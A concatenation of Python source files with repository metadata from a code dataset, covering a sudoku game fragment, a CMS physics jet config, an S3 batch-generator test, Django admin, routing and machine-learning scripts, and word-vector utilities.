print(" @@@& @@@ @@@ (@@( @@@* @@@% #@@% @@@,.@@@. @@@, @@@. ")
print(" ,@@@@@@* @@@ @@@ (@@( (@@% .@@@* ,@@@ @@@%@@% @@@, @@@. ")
print(" /@@@@@# @@@ @@@ (@@( (@@% .@@@* ,@@@ @@@,@@@( @@@, @@@. ")
print(" *@@@. @@@ .@@& (@@( @@@. @@@% &@@( @@@, &@@@. @@@* .@@@. ")
print(" &, &@@@ #@@@. ,@@@, (@@( ,&@@@* ,@@@& .@@@@ @@@, (@@@/ #@@@* @@@# ")
print(",@@@@@@@@( (@@@@@@@@% (@@@@@@@@@( #@@@@@@@@@, @@@, ,@@@% ,@@@@@@@@@. \n ")
print("To start game input:")
print(" r - to load random puzzle:")
print(" 1 - to load chart nr 1:")
print(" 2 - to load chart nr 2:")
print(" 3 - to load chart nr 3:")
choice = input("Input here: ")
if choice == "R" or choice == "r":
sudoku_number = randint(0, 1)
rows_fill(sudoku_number)
elif int(choice) == 1:
rows_fill(0)
elif int(choice) == 2:
rows_fill(1)
elif int(choice) == 3:
rows_fill(0)
print("Your sudoku to solve:")
try:
if sum(row1) == 45 and sum(row2) == 45 and sum(row3) == 45 and sum(row4) == 45 and sum(
row5) == 45 and sum(row6) == 45 and sum(row7) == 45 and sum(row8) == 45 and sum(row9) == 45:
print("YOU WIN")
break
except TypeError:
print()
'''
| [
"inz.kamil.wos@gmail.com"
] | inz.kamil.wos@gmail.com |
511c9b0d7215e0f07ac854e1432936f04778ae66 | 37c243e2f0aab70cbf38013d1d91bfc3a83f7972 | /pp7TeV/HeavyIonsAnalysis/JetAnalysis/python/jets/ak6PFJetSequence_pPb_mc_bTag_cff.py | 4ad43ec58638c60213bfc117e17f453046685d97 | [] | no_license | maoyx/CMSWork | 82f37256833cbe4c60cb8df0b4eb68ceb12b65e7 | 501456f3f3e0f11e2f628b40e4d91e29668766d5 | refs/heads/master | 2021-01-01T18:47:55.157534 | 2015-03-12T03:47:15 | 2015-03-12T03:47:15 | 10,951,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,363 | py |
import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.patHeavyIonSequences_cff import *
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
from HeavyIonsAnalysis.JetAnalysis.bTaggers_cff import *
from RecoJets.JetProducers.JetIDParams_cfi import *
ak6PFmatch = patJetGenJetMatch.clone(
src = cms.InputTag("ak6PFJets"),
matched = cms.InputTag("ak6HiGenJets")
)
ak6PFparton = patJetPartonMatch.clone(src = cms.InputTag("ak6PFJets")
)
ak6PFcorr = patJetCorrFactors.clone(
useNPV = False,
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("ak6PFJets"),
payload = "AK6PF_generalTracks"
)
ak6PFJetID= cms.EDProducer('JetIDProducer', JetIDParams, src = cms.InputTag('ak6CaloJets'))
ak6PFclean = heavyIonCleanedGenJets.clone(src = cms.InputTag('ak6HiGenJets'))
ak6PFbTagger = bTaggers("ak6PF")
#create objects locally since they dont load properly otherwise
ak6PFmatch = ak6PFbTagger.match
ak6PFparton = ak6PFbTagger.parton
ak6PFPatJetFlavourAssociation = ak6PFbTagger.PatJetFlavourAssociation
ak6PFJetTracksAssociatorAtVertex = ak6PFbTagger.JetTracksAssociatorAtVertex
ak6PFSimpleSecondaryVertexHighEffBJetTags = ak6PFbTagger.SimpleSecondaryVertexHighEffBJetTags
ak6PFSimpleSecondaryVertexHighPurBJetTags = ak6PFbTagger.SimpleSecondaryVertexHighPurBJetTags
ak6PFCombinedSecondaryVertexBJetTags = ak6PFbTagger.CombinedSecondaryVertexBJetTags
ak6PFCombinedSecondaryVertexMVABJetTags = ak6PFbTagger.CombinedSecondaryVertexMVABJetTags
ak6PFJetBProbabilityBJetTags = ak6PFbTagger.JetBProbabilityBJetTags
ak6PFSoftMuonByPtBJetTags = ak6PFbTagger.SoftMuonByPtBJetTags
ak6PFSoftMuonByIP3dBJetTags = ak6PFbTagger.SoftMuonByIP3dBJetTags
ak6PFTrackCountingHighEffBJetTags = ak6PFbTagger.TrackCountingHighEffBJetTags
ak6PFTrackCountingHighPurBJetTags = ak6PFbTagger.TrackCountingHighPurBJetTags
ak6PFPatJetPartonAssociation = ak6PFbTagger.PatJetPartonAssociation
ak6PFImpactParameterTagInfos = ak6PFbTagger.ImpactParameterTagInfos
ak6PFJetProbabilityBJetTags = ak6PFbTagger.JetProbabilityBJetTags
ak6PFPositiveOnlyJetProbabilityJetTags = ak6PFbTagger.PositiveOnlyJetProbabilityJetTags
ak6PFNegativeOnlyJetProbabilityJetTags = ak6PFbTagger.NegativeOnlyJetProbabilityJetTags
ak6PFNegativeTrackCountingHighEffJetTags = ak6PFbTagger.NegativeTrackCountingHighEffJetTags
ak6PFNegativeTrackCountingHighPur = ak6PFbTagger.NegativeTrackCountingHighPur
ak6PFNegativeOnlyJetBProbabilityJetTags = ak6PFbTagger.NegativeOnlyJetBProbabilityJetTags
ak6PFPositiveOnlyJetBProbabilityJetTags = ak6PFbTagger.PositiveOnlyJetBProbabilityJetTags
ak6PFSecondaryVertexTagInfos = ak6PFbTagger.SecondaryVertexTagInfos
ak6PFSimpleSecondaryVertexHighEffBJetTags = ak6PFbTagger.SimpleSecondaryVertexHighEffBJetTags
ak6PFSimpleSecondaryVertexHighPurBJetTags = ak6PFbTagger.SimpleSecondaryVertexHighPurBJetTags
ak6PFCombinedSecondaryVertexBJetTags = ak6PFbTagger.CombinedSecondaryVertexBJetTags
ak6PFCombinedSecondaryVertexMVABJetTags = ak6PFbTagger.CombinedSecondaryVertexMVABJetTags
ak6PFSecondaryVertexNegativeTagInfos = ak6PFbTagger.SecondaryVertexNegativeTagInfos
ak6PFSimpleSecondaryVertexNegativeHighEffBJetTags = ak6PFbTagger.SimpleSecondaryVertexNegativeHighEffBJetTags
ak6PFSimpleSecondaryVertexNegativeHighPurBJetTags = ak6PFbTagger.SimpleSecondaryVertexNegativeHighPurBJetTags
ak6PFCombinedSecondaryVertexNegativeBJetTags = ak6PFbTagger.CombinedSecondaryVertexNegativeBJetTags
ak6PFCombinedSecondaryVertexPositiveBJetTags = ak6PFbTagger.CombinedSecondaryVertexPositiveBJetTags
ak6PFSoftMuonTagInfos = ak6PFbTagger.SoftMuonTagInfos
ak6PFSoftMuonBJetTags = ak6PFbTagger.SoftMuonBJetTags
ak6PFSoftMuonByIP3dBJetTags = ak6PFbTagger.SoftMuonByIP3dBJetTags
ak6PFSoftMuonByPtBJetTags = ak6PFbTagger.SoftMuonByPtBJetTags
ak6PFNegativeSoftMuonByPtBJetTags = ak6PFbTagger.NegativeSoftMuonByPtBJetTags
ak6PFPositiveSoftMuonByPtBJetTags = ak6PFbTagger.PositiveSoftMuonByPtBJetTags
ak6PFPatJetFlavourId = cms.Sequence(ak6PFPatJetPartonAssociation*ak6PFPatJetFlavourAssociation)
ak6PFJetBtaggingIP = cms.Sequence(ak6PFImpactParameterTagInfos *
(ak6PFTrackCountingHighEffBJetTags +
ak6PFTrackCountingHighPurBJetTags +
ak6PFJetProbabilityBJetTags +
ak6PFJetBProbabilityBJetTags +
ak6PFPositiveOnlyJetProbabilityJetTags +
ak6PFNegativeOnlyJetProbabilityJetTags +
ak6PFNegativeTrackCountingHighEffJetTags +
ak6PFNegativeTrackCountingHighPur +
ak6PFNegativeOnlyJetBProbabilityJetTags +
ak6PFPositiveOnlyJetBProbabilityJetTags
)
)
ak6PFJetBtaggingSV = cms.Sequence(ak6PFImpactParameterTagInfos
*
ak6PFSecondaryVertexTagInfos
* (ak6PFSimpleSecondaryVertexHighEffBJetTags
+
ak6PFSimpleSecondaryVertexHighPurBJetTags
+
ak6PFCombinedSecondaryVertexBJetTags
+
ak6PFCombinedSecondaryVertexMVABJetTags
)
)
ak6PFJetBtaggingNegSV = cms.Sequence(ak6PFImpactParameterTagInfos
*
ak6PFSecondaryVertexNegativeTagInfos
* (ak6PFSimpleSecondaryVertexNegativeHighEffBJetTags
+
ak6PFSimpleSecondaryVertexNegativeHighPurBJetTags
+
ak6PFCombinedSecondaryVertexNegativeBJetTags
+
ak6PFCombinedSecondaryVertexPositiveBJetTags
)
)
ak6PFJetBtaggingMu = cms.Sequence(ak6PFSoftMuonTagInfos * (ak6PFSoftMuonBJetTags
+
ak6PFSoftMuonByIP3dBJetTags
+
ak6PFSoftMuonByPtBJetTags
+
ak6PFNegativeSoftMuonByPtBJetTags
+
ak6PFPositiveSoftMuonByPtBJetTags
)
)
ak6PFJetBtagging = cms.Sequence(ak6PFJetBtaggingIP
*ak6PFJetBtaggingSV
*ak6PFJetBtaggingNegSV
*ak6PFJetBtaggingMu
)
ak6PFpatJetsWithBtagging = patJets.clone(jetSource = cms.InputTag("ak6PFJets"),
genJetMatch = cms.InputTag("ak6PFmatch"),
genPartonMatch = cms.InputTag("ak6PFparton"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("ak6PFcorr")),
JetPartonMapSource = cms.InputTag("ak6PFPatJetFlavourAssociation"),
trackAssociationSource = cms.InputTag("ak6PFJetTracksAssociatorAtVertex"),
discriminatorSources = cms.VInputTag(cms.InputTag("ak6PFSimpleSecondaryVertexHighEffBJetTags"),
cms.InputTag("ak6PFSimpleSecondaryVertexHighPurBJetTags"),
cms.InputTag("ak6PFCombinedSecondaryVertexBJetTags"),
cms.InputTag("ak6PFCombinedSecondaryVertexMVABJetTags"),
cms.InputTag("ak6PFJetBProbabilityBJetTags"),
cms.InputTag("ak6PFJetProbabilityBJetTags"),
cms.InputTag("ak6PFSoftMuonByPtBJetTags"),
cms.InputTag("ak6PFSoftMuonByIP3dBJetTags"),
cms.InputTag("ak6PFTrackCountingHighEffBJetTags"),
cms.InputTag("ak6PFTrackCountingHighPurBJetTags"),
),
jetIDMap = cms.InputTag("ak6PFJetID"),
addBTagInfo = True,
addTagInfos = True,
addDiscriminators = True,
addAssociatedTracks = True,
addJetCharge = False,
addJetID = True,
getJetMCFlavour = True,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
embedCaloTowers = False,
embedPFCandidates = True
)
ak6PFJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("ak6PFpatJetsWithBtagging"),
genjetTag = 'ak6HiGenJets',
rParam = 0.6,
matchJets = cms.untracked.bool(False),
matchTag = 'patJetsWithBtagging',
pfCandidateLabel = cms.untracked.InputTag('particleFlow'),
trackTag = cms.InputTag("generalTracks"),
fillGenJets = True,
isMC = True,
genParticles = cms.untracked.InputTag("hiGenParticles"),
eventInfoTag = cms.InputTag("generator"),
doLifeTimeTagging = cms.untracked.bool(True),
doLifeTimeTaggingExtras = cms.untracked.bool(True),
bTagJetName = cms.untracked.string("ak6PF"),
genPtMin = cms.untracked.double(15),
hltTrgResults = cms.untracked.string('TriggerResults::'+'HISIGNAL')
)
ak6PFJetSequence_mc = cms.Sequence(
ak6PFclean
*
ak6PFmatch
*
ak6PFparton
*
ak6PFcorr
*
ak6PFJetID
*
ak6PFPatJetFlavourId
*
ak6PFJetTracksAssociatorAtVertex
*
ak6PFJetBtagging
*
ak6PFpatJetsWithBtagging
*
ak6PFJetAnalyzer
)
ak6PFJetSequence_data = cms.Sequence(ak6PFcorr
*
ak6PFJetTracksAssociatorAtVertex
*
ak6PFJetBtagging
*
ak6PFpatJetsWithBtagging
*
ak6PFJetAnalyzer
)
ak6PFJetSequence_jec = ak6PFJetSequence_mc
ak6PFJetSequence_mix = ak6PFJetSequence_mc
ak6PFJetSequence = cms.Sequence(ak6PFJetSequence_mc)
| [
"yaxian.mao@cern.ch"
] | yaxian.mao@cern.ch |
b052cc54020a43043bb7d1822c05072b653f6113 | 46f358b954d2d0067a2093ee9006e222f831a8f8 | /tests/datasource/batch_kwarg_generator/test_s3_subdir_reader_generator.py | 474a13f241874c6c833756f7ae698d9226069a0e | [
"Apache-2.0"
] | permissive | dhruvvyas90/great_expectations | b963aa99c683a0da3a9e2b5a1046d2a32f622c7b | fddf5336065c644558c528301e601b9f02be87e2 | refs/heads/main | 2023-01-28T15:26:55.331282 | 2020-12-03T18:52:14 | 2020-12-03T18:52:14 | 319,719,900 | 1 | 0 | Apache-2.0 | 2020-12-08T18:02:33 | 2020-12-08T18:02:32 | null | UTF-8 | Python | false | false | 3,651 | py | import logging
import os
import time
import pandas as pd
import pytest
import requests
from botocore.session import Session
from great_expectations.datasource.batch_kwargs_generator import (
S3SubdirReaderBatchKwargsGenerator,
)
from great_expectations.exceptions import BatchKwargsError
port = 5555
endpoint_uri = "http://127.0.0.1:%s/" % port
os.environ["AWS_ACCESS_KEY_ID"] = "dummy_key"
os.environ["AWS_SECRET_ACCESS_KEY"] = "dummy_secret"
@pytest.fixture(scope="module")
def s3_base():
# writable local S3 system
import shlex
import subprocess
proc = subprocess.Popen(shlex.split("moto_server s3 -p %s" % port))
timeout = 5
while timeout > 0:
try:
r = requests.get(endpoint_uri)
if r.ok:
break
except:
pass
timeout -= 0.1
time.sleep(0.1)
yield
proc.terminate()
proc.wait()
@pytest.fixture(scope="module")
def mock_s3_bucket(s3_base):
bucket = "test_bucket"
session = Session()
client = session.create_client("s3", endpoint_url=endpoint_uri)
client.create_bucket(Bucket=bucket, ACL="public-read")
df = pd.DataFrame({"c1": [1, 2, 3], "c2": ["a", "b", "c"]})
keys = [
"data/for/you.csv",
"data/for/me.csv",
]
for key in keys:
client.put_object(
Bucket=bucket, Body=df.to_csv(index=None).encode("utf-8"), Key=key
)
yield bucket
@pytest.fixture
def s3_subdir_generator(mock_s3_bucket, basic_sparkdf_datasource):
# We configure a generator that will fetch from (mocked) my_bucket
# and will use glob patterns to match returned assets into batches of the same asset
generator = S3SubdirReaderBatchKwargsGenerator(
"my_generator",
datasource=basic_sparkdf_datasource,
boto3_options={"endpoint_url": endpoint_uri},
base_directory="test_bucket/data/for",
reader_options={"sep": ","},
)
yield generator
@pytest.fixture
def s3_subdir_generator_with_partition(mock_s3_bucket, basic_sparkdf_datasource):
# We configure a generator that will fetch from (mocked) my_bucket
# and will use glob patterns to match returned assets into batches of the same asset
generator = S3SubdirReaderBatchKwargsGenerator(
"my_generator",
datasource=basic_sparkdf_datasource,
boto3_options={"endpoint_url": endpoint_uri},
base_directory="test_bucket/data/",
reader_options={"sep": ","},
)
yield generator
def test_s3_subdir_generator_basic_operation(s3_subdir_generator):
# S3 Generator sees *only* configured assets
assets = s3_subdir_generator.get_available_data_asset_names()
print(assets)
assert set(assets["names"]) == {
("you", "file"),
("me", "file"),
}
def test_s3_subdir_generator_reader_options_configuration(s3_subdir_generator):
batch_kwargs_list = [
kwargs
for kwargs in s3_subdir_generator.get_iterator(data_asset_name="you", limit=10)
]
print(batch_kwargs_list)
assert batch_kwargs_list[0]["reader_options"] == {"sep": ","}
def test_s3_subdir_generator_build_batch_kwargs_no_partition_id(s3_subdir_generator):
batch_kwargs = s3_subdir_generator.build_batch_kwargs("you")
assert batch_kwargs["s3"] in [
"s3a://test_bucket/data/for/you.csv",
]
def test_s3_subdir_generator_build_batch_kwargs_partition_id(
s3_subdir_generator_with_partition, basic_sparkdf_datasource
):
batch_kwargs = s3_subdir_generator_with_partition.build_batch_kwargs("for", "you")
assert batch_kwargs["s3"] == "s3a://test_bucket/data/for/you.csv"
| [
"noreply@github.com"
] | dhruvvyas90.noreply@github.com |
df4c36a1dc5bc53bae474b0786ee097f35deb401 | 69be72354ed9382f36ec2264d5e4b60cdf71f5e9 | /01_hello.py | 909b04a52c610505ed440ed6878ec74ac377c176 | [] | no_license | trungams/mcgill-comp204-example-code | 0e4a327684097044e105e67a0f16dd8294320e0f | 7a62f1becfd9f33c499ec60251b04557743b4cfe | refs/heads/master | 2020-05-18T02:32:54.484052 | 2019-04-29T18:00:43 | 2019-04-29T18:00:43 | 184,119,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 589 | py | #!/usr/bin/env python3
"""
A simple program that prints the message Hello, world!
"""
if __name__ == '__main__':
# prints the message hello
print("Hello, world!") # prints message
# Comments in Python starts with a '#'
"""However, developers takes advantage of triple-quoted string literals
in Python to document their code, it can span multiple lines, and hence
often used as multi line comments
"""
"With the same reasoning, double-quoted strings can also be used to comment"
# But triple quotes are encouraged in the official style guide
| [
"vttrung12@gmail.com"
] | vttrung12@gmail.com |
f5c421078f74367978d8ce242ab1cd6b034f6cfc | 5c69c98a0d6240532593b725ed9ec7b66145bc64 | /products/admin.py | f19c11bf199695b871b2781a18d9b85cac344ad8 | [] | no_license | Galiaph/django_test | 9a97447f96c21320b5f9943cb9a5f0da6937a20c | e7153dd318ce65d627b9f2596bf39db5a65ec782 | refs/heads/master | 2020-03-07T19:10:49.833654 | 2018-04-17T20:17:07 | 2018-04-17T20:17:07 | 127,664,423 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 590 | py | from django.contrib import admin
from .models import *
class ProductImageInline(admin.TabularInline):
model = ProductImage
extra = 0
class ProductAdmin(admin.ModelAdmin):
list_display = [field.name for field in Product._meta.fields]
inlines = [ProductImageInline]
class Meta:
model = Product
admin.site.register(Product, ProductAdmin)
class ProductImageAdmin(admin.ModelAdmin):
list_display = [field.name for field in ProductImage._meta.fields]
class Meta:
model = ProductImage
admin.site.register(ProductImage, ProductImageAdmin)
| [
"galiaph@gmail.com"
] | galiaph@gmail.com |
c77e5dd5865c4b2fa11a7b2cf99bdae5d46cb5f3 | 6602091e12f9725d2463589a64d7f661e25d65d7 | /src/input.py | 4ff4fe8098e90945e9ab8fefeb083bbbb184e6b7 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | xBorox1/D-Wave-VRP | e9eb62998f2bb34130f534b93c46a1a33069f414 | dd9b51c812d4f5607dae6ce3ac528d013e5a6f27 | refs/heads/master | 2023-03-13T23:39:15.384346 | 2021-03-06T09:21:54 | 2021-03-06T09:21:54 | 284,447,637 | 8 | 7 | null | 2021-03-06T09:21:55 | 2020-08-02T11:25:27 | Python | UTF-8 | Python | false | false | 4,641 | py | import networkx as nx
import csv
import math
from itertools import product
from vrp_problem import VRPProblem
import numpy as np
# Creates directed graph from file.
# Format : id1|id2|cost
def create_graph_from_csv(path):
g = nx.DiGraph(directed=True)
with open(path, mode='r') as e_infile:
reader = csv.reader(e_infile)
next(reader)
for row in reader:
id1 = int(row[0])
id2 = int(row[1])
cost = float(row[2])
g.add_edge(id1, id2, cost=cost)
return g
# Creates VRPProblem from test file and graph file.
# path - path to test file
# graph_path - path to graph file
# capacity - True if vehicles have capacities, False otherwise
def read_full_test(path, graph_path, capacity = True):
graph = create_graph_from_csv(graph_path)
in_file = open(path, 'r')
nodes_id = list()
# Reading magazines.
next(in_file)
nodes_id = [int(s) for s in in_file.readline().split() if s.isdigit()]
magazines_num = len(nodes_id)
# Reading destinations.
dests_num = int(in_file.readline())
nodes_num = dests_num + magazines_num
weights = np.zeros((nodes_num), dtype=int)
for i in range(dests_num):
order = in_file.readline().split()
dest = int(order[0])
nodes_id.append(dest)
if capacity:
weight = int(order[1])
weights[i + magazines_num] = weight
# Reading vehicles.
vehicles = int(in_file.readline())
capacities = np.ones((vehicles), dtype=int)
if capacity:
capacities = [int(s) for s in in_file.readline().split() if s.isdigit()]
# Generating costs matrix.
costs = np.zeros((nodes_num, nodes_num), dtype=int)
for i in range(nodes_num):
source = nodes_id[i]
_, paths = nx.single_source_dijkstra(graph, source, weight = 'cost')
for j in range(nodes_num):
d = nodes_id[j]
path = paths[d]
prev = source
for node in path[1:]:
edge = graph.get_edge_data(prev, node)
costs[i][j] += edge['cost']
prev = node
in_file.close()
sources = [i for i in range(magazines_num)]
dests = [i for i in range(magazines_num, nodes_num)]
return VRPProblem(sources, costs, capacities, dests, weights)
# Creates VRPProblem from test file.
# path - path to test file
# capacity - True if vehicles have capacities, False otherwise
def read_test(path, capacity = True):
in_file = open(path, 'r')
magazines_num = int(in_file.readline())
dests_num = int(in_file.readline())
nodes_num = magazines_num + dests_num
# Reading weights of destinations.
weights = np.zeros((nodes_num), dtype=int)
if capacity:
w = [int(s) for s in in_file.readline().split() if s.isdigit()]
for i in range(dests_num):
weights[i + magazines_num] = w[i]
# Reading costs.
costs = np.zeros((nodes_num, nodes_num), dtype=int)
for i in range(nodes_num):
costs[i] = [int(s) for s in in_file.readline().split() if s.isdigit()]
# Reading vehicles.
vehicles = int(in_file.readline())
capacities = np.ones((vehicles), dtype=int)
if capacity:
capacities = [int(s) for s in in_file.readline().split() if s.isdigit()]
in_file.close()
sources = [i for i in range(magazines_num)]
dests = [i for i in range(magazines_num, nodes_num)]
return VRPProblem(sources, costs, capacities, dests, weights)
# Creates one-file test from format with graph.
# in_path - test input file
# graph_path - graph input file
# out_path - output
# capacity - True if vehicles have capacities, False otherwise
def create_test(in_path, graph_path, out_path, capacity = True):
test = read_full_test(in_path, graph_path, capacity)
out_file = open(out_path, 'w+')
# Number of magazines.
out_file.write(str(len(test.sources)) + '\n')
# Number of destinations..
out_file.write(str(len(test.dests)) + '\n')
# Weights of destinations.
if capacity:
for dest in test.dests:
out_file.write(str(test.weights[dest]) + ' ')
out_file.write('\n')
# Costs.
n = len(test.sources) + len(test.dests)
for i in range(n):
for j in range(n):
out_file.write(str(test.costs[i][j]) + ' ')
out_file.write('\n')
# Vehicles.
out_file.write(str(len(test.capacities)) + '\n')
if capacity:
for i in range(len(test.capacities)):
out_file.write(str(test.capacities[i]) + ' ')
out_file.write('\n')
out_file.close()
| [
"M.Borowski282@gmail.com"
] | M.Borowski282@gmail.com |
a853bd82905b1a57a3ffd8bd9d2f4f90ffd696ae | c95021e80235610f448c31318a6a79fef1662b6f | /Tarea2/FileCreator.py | a42f293f9698021d2ef9117c72c181cd8c2f439f | [] | no_license | diegobano/Inteligencia | c02c5941c33b5d71bc0f45d43f06bb81be04a5fe | 90f2b0a8b27e9b8088ae00643b24af91475cef42 | refs/heads/master | 2021-01-20T13:26:13.645567 | 2017-06-18T04:40:45 | 2017-06-18T04:40:45 | 90,488,176 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,602 | py | import numpy as np
import random
db = np.zeros((5500, 49))
f = open("sensorless_tarea2.txt", "r")
for (i, line) in enumerate(f):
db[i] = line.split(",")
f.close()
db_pbs = [0] * 11
for i in range(len(db)):
db_pbs[int(db[i, 48])-1] += 1
random.shuffle(db)
ex = db[0:(len(db)/10)*8,:]
ex_pbs = [0] * 11
test = db[(len(db)/10)*8:, :]
test_pbs = [0] * 11
for i in range(len(ex)):
ex_pbs[int(ex[i, 48])-1] += 1
for i in range(len(test)):
test_pbs[int(test[i, 48])-1] += 1
acc = 0.015
done = True
while True:
for i in range(11):
if abs(float(db_pbs[i])/sum(db_pbs) - float(ex_pbs[i])/sum(ex_pbs)) > acc or\
abs(float(db_pbs[i]) / sum(db_pbs) - float(test_pbs[i]) / sum(test_pbs)) > acc:
done = False
break
done = True
if done:
break
print len(db)
random.shuffle(db)
ex = db[0:(len(db) / 10) * 8, :]
ex_pbs = [0] * 11
test = db[(len(db) / 10) * 8:, :]
test_pbs = [0] * 11
for i in range(len(ex)):
ex_pbs[int(ex[i, 48]) - 1] += 1
for i in range(len(test)):
test_pbs[int(test[i, 48]) - 1] += 1
print db_pbs
print ex_pbs
print test_pbs
ex_file = open("training.txt", "w")
for i in ex:
for el in range(48):
ex_file.write(str(i[el]))
ex_file.write(",")
ex_file.write(str(i[48]))
ex_file.write("\n")
ex_file.close()
test_file = open("tester.txt", "w")
for i in test:
for el in range(48):
test_file.write(str(i[el]))
test_file.write(",")
test_file.write(str(i[48]))
test_file.write("\n")
test_file.close() | [
"diego.r.bano@hotmail.com"
] | diego.r.bano@hotmail.com |
907d7eef1ed604a686dd3e46f859509d4d807ec7 | 479ed684323748ca54ce0ab995945b19777a2e86 | /src/corpus.py | b3778b8632a76bf997e3fc78e3107d77cb2eb370 | [] | no_license | cerisara/covid | c0d92d500bbce39c7baf3f68cc67fdef67d6de4b | 56261198556e2a0c71fb775c0ef8ba003060a6a2 | refs/heads/master | 2021-05-18T00:55:39.919731 | 2020-03-29T17:26:21 | 2020-03-29T17:26:21 | 251,034,554 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,264 | py | import glob
import json
curfile=""
def loadData(full=False):
global curfile
if full:
files = []
files += [f for f in glob.glob("/data/xtof/corpus/covid/biorxiv_medrxiv/*.json")]
files += [f for f in glob.glob("/data/xtof/corpus/covid/comm_use_subset/*.json")]
files += [f for f in glob.glob("/data/xtof/corpus/covid/custom_license/*.json")]
files += [f for f in glob.glob("/data/xtof/corpus/covid/noncomm_use_subset/*.json")]
else:
files = [f for f in glob.glob("../sampdata/*.json")]
for f in files:
curfile=f
try:
with open(f,"r") as ff: o=json.load(ff)
# print(o.keys())
# [u'body_text', u'bib_entries', u'abstract', u'back_matter', u'paper_id', u'ref_entries', u'metadata']
txt = o['body_text']
utts = []
for oo in txt:
utts.append(oo['text'])
yield utts
except:
print("ERROR file "+f)
"""
distrib de la longueur des chiffres sur tout le corpus:
Counter({1: 3745400, 2: 2617545, 4: 997545, 3: 789312, 0: 187201, 6: 22878, 5: 18303, 8: 5994, 7: 2921, 9: 629, 10: 194, 11: 141, 12: 57, 13: 39, 14: 26, 15: 18, 16: 8, 19: 1, 17: 1, 38: 1, 48: 1, 25: 1})
"""
| [
"cerisara@loria.fr"
] | cerisara@loria.fr |
1b7274303f6149db5acf42528a46f785df6e2c5e | 64de57b0fdce14bba94296191876bdb655e577b9 | /Part 3 - Classification/Section 18 - Naive Bayes/naive_bayes.py | 174f2ae79ff689bd1764a60d75c3b833edc3dd5b | [] | no_license | cszatmary/machine-learning-exercises | cfb341aaec4cf9dc1580ad49a28738a0b399d674 | 89a6b319b2bcadf3cf5ad1c18c1b4513b0878251 | refs/heads/master | 2021-09-22T05:20:20.214082 | 2018-09-05T21:36:38 | 2018-09-05T21:36:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,957 | py | # Naive Bayes
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import confusion_matrix
from matplotlib.colors import ListedColormap
# Importing the dataset
dataset = pd.read_csv('Social_Network_Ads.csv')
X = dataset.iloc[:, [2, 3]].values
y = dataset.iloc[:, 4].values
# Splitting the dataset into the Training set and Test set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)
# Feature Scaling
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
# Fitting Naive Bayes to the Training set
classifier = GaussianNB()
classifier.fit(X_train, y_train)
# Predicting the Test set results
y_pred = classifier.predict(X_test)
# Making the Confusion Matrix
cm = confusion_matrix(y_test, y_pred)
def graph_results(X_set, y_set, title):
X1, X2 = np.meshgrid(np.arange(start=X_set[:, 0].min() - 1, stop=X_set[:, 0].max() + 1, step=0.01),
np.arange(start=X_set[:, 1].min() - 1, stop=X_set[:, 1].max() + 1, step=0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
alpha=0.75, cmap=ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c=ListedColormap(('red', 'green'))(i), label=j)
plt.title(title)
plt.xlabel("Age")
plt.ylabel("Estimated Salary")
plt.legend()
plt.show()
# Visualising the Training set results
graph_results(X_train, y_train, "Naive Bayes (Training set)")
# Visualising the Test set results
graph_results(X_test, y_test, "Naive Bayes (Test set)")
| [
"cs@christopherszatmary.com"
] | cs@christopherszatmary.com |
83b0d45f575965f1b527a445029b7871e3ba7cf0 | 3b45ba8255f9ecbca5235182b492dea7345f5f12 | /distributedwordreps.py | db4031e5585f241f520845285544baf11e904c4a | [] | no_license | tsnaomi/collaborative-reference | 812228664b7a9953abb687dfc0f768f5b19a8116 | c8c20810c4f4d154ecbbea6dd1bb6e52e437259e | refs/heads/master | 2021-01-21T13:04:11.206092 | 2016-04-21T00:38:36 | 2016-04-21T00:38:36 | 36,094,691 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,592 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# For CS224u, Stanford, Spring 2015 (Chris Potts)
# Exported from distributedwordreps.ipynb, which can
# also be viewed in HTML: distributedwordreps.html
######################################################################
import os
import sys
import csv
import copy
import random
import itertools
from operator import itemgetter
from collections import defaultdict
# Make sure you've got Numpy and Scipy installed:
import numpy as np
import scipy
import scipy.spatial.distance
from numpy.linalg import svd
# For visualization:
import matplotlib.pyplot as plt
# For clustering in the 'Word-sense ambiguities' section:
from sklearn.cluster import AffinityPropagation
######################################################################
# Reading in matrices
def build(src_filename, delimiter=',', header=True, quoting=csv.QUOTE_MINIMAL):
reader = csv.reader(file(src_filename), delimiter=delimiter, quoting=quoting)
colnames = None
if header:
colnames = reader.next()
colnames = colnames[1: ]
mat = []
rownames = []
for line in reader:
rownames.append(line[0])
mat.append(np.array(map(float, line[1: ])))
return (np.array(mat), rownames, colnames)
######################################################################
# Vector comparison
def euclidean(u, v):
# Use scipy's method:
return scipy.spatial.distance.euclidean(u, v)
# Or define it yourself:
# return vector_length(u - v)
def vector_length(u):
return np.sqrt(np.dot(u, u))
def length_norm(u):
return u / vector_length(u)
def cosine(u, v):
# Use scipy's method:
return scipy.spatial.distance.cosine(u, v)
# Or define it yourself:
